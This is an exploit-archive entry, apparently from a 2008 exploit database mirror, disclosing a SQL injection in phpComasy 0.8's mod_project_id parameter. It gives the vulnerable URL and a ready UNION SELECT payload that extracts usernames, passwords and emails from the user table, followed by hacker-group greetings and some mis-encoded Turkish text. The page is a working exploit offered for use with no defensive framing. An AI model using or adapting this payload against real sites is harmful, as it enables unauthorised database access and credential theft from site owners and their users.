phpComasy 0.8 (mod_project_id) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : phpComasy 0.8 (mod_project_id) Remote SQL Injection Vulnerability
# Published : 2008-03-01
# Author : Cr@zy_King
# Previous Title : phpArcadeScript <= 3.0RC2 (userid) SQL Injection Vulnerability
# Next Title : Dynamic photo gallery 1.02 (albumID) Remote SQL Injection Vulnerability

By Cr@zy_King / crazy_kinq@hotmail.co.uk

phpComasy 0.8 (mod_project_id) Remote Sql ?°nj. Vuln

Script Down : http://www.phpcomasy.com/index.php?id=7&mod_action=project_detail&mod_project_id=9

Page : index.php?id=7&mod_action=project_detail&mod_project_id=Sql.

Exp : -9+union+select+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7+from+user

Not : Hi?§kimse Kendini pahal?± Zannetmesin Hepinizin ?°ndirim G??n??n?? Biliyorum ;)

Hackshow.us / Hack Bir Showdur.

Greatz : Eno7 - Crackers_Child - Thehacker - Ghost61 - Tilkiandre - Edoras - The_Bekir - DreamTurk

Special Greatz : str0ke and SuSkun (since 2003 :) Ho??geldin Suskun Abi.

# www.Syue.com [2008-03-01]